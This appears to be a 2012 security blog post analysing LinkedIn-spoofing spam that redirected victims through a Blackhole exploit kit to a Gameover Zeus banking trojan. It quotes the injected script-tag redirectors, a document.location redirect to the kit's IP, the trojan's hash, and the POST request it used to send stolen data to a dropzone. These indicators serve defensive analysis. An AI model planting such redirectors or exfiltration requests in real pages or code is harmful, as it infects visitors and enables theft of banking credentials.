More LinkedIn Spam

The spam cannons fired early this morning signaling the start to another work week. Today, 2012-03-19, we saw another round of spam spoofing communications from LinkedIn. One observed sample had the subject line “LinkedIn Invitation from your colleague.” Other observed subject lines were as follows:

  • LinkedIn private message
  • LinkedIn Reminder
  • LinkedIn Notification
  • LinkedIn Invitation from your c0-worker
  • LinkedIn Notification service message

The spam sample we analyzed included a malicious link to kanaryam1907.com/PS74EAtf/index.html. This page contained the following malicious javascript redirectors:

<script type=”text/javascript” src=”http://anwaralsham-sd.com/fEynoZZJ/js.js”></script&gt;
<script type=”text/javascript” src=”http://core3s.org/VD2EZfxH/js.js”></script&gt;
<script type=”text/javascript” src=”http://bax98.us/tD6s1rLp/js.js”></script&gt;
<script type=”text/javascript” src=”http://centrovetaveiro.com/dZ6Ps215/js.js”></script&gt;

The redirectors contained the following document.location script:

document.location=’http://85.114.130.196:8080/showthread.php?t=73a07bcb51f4be71&#8242;;

This document.location script redirected victims to a Blackhole Exploit kit at 85.114.130.196. This kit dropped a Gameover Zeus banking trojan with the following properties:

Size: 285208
MD5: BFE53CA58B226DB64542815630A9561C

This Gameover Zeus variant had a botid of mmz19 and sent stolen data to a dropzone at 84.32.108.54 over port 15025 via the following POST request:

POST /index.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Cookie: cid=3005
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)
Host: 84.32.108.54:15025
Content-Length: 295
Connection: Keep-Alive

Note that last week we saw the same LinkedIn spam template used to drop Bugat/Feodo – see our previous post ‘LinkedIn Notification‘ on 2012-03-16. The reuse of the same template to drop both Bugat/Feodo and Gameover Zeus is probably not a coincidence.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: